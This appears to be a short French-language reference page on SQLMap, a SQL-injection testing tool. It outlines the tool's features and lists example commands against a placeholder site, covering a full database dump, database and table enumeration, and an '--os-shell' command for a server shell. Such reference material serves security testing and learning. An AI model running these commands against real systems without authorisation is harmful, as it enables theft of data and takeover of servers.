SQLMap
L’outil automatisé de référence pour détecter et exploiter des injections SQL.
Présentation
SQLMap est un outil open-source permettant de détecter, tester et exploiter automatiquement des vulnérabilités d’injection SQL. Il prend en charge de nombreux moteurs de base de données et propose des fonctionnalités puissantes pour exfiltrer des données, obtenir un shell ou même compromettre le serveur.
Fonctionnalités principales
- Détection automatique des injections SQL
- Support MySQL, MSSQL, Oracle, PostgreSQL, SQLite...
- Extraction de données (tables, users, bases)
- Dump complet d’une base de données
- Prise de contrôle du serveur via shell
- Bypass WAF et protections HTTP
- Attaques avancées (OS Shell, file upload)
Commandes essentielles
# Scan simple
sqlmap -u "http://site.com/page.php?id=1"
# Dump d'une base
sqlmap -u "http://site.com/page.php?id=1" --dump
# Lister les bases
sqlmap -u "http://site.com/page.php?id=1" --dbs
# Lister les tables
sqlmap -u "http://site.com/page.php?id=1" -D ma_base --tables
# Shell sur le serveur
sqlmap -u "http://site.com/page.php?id=1" --os-shell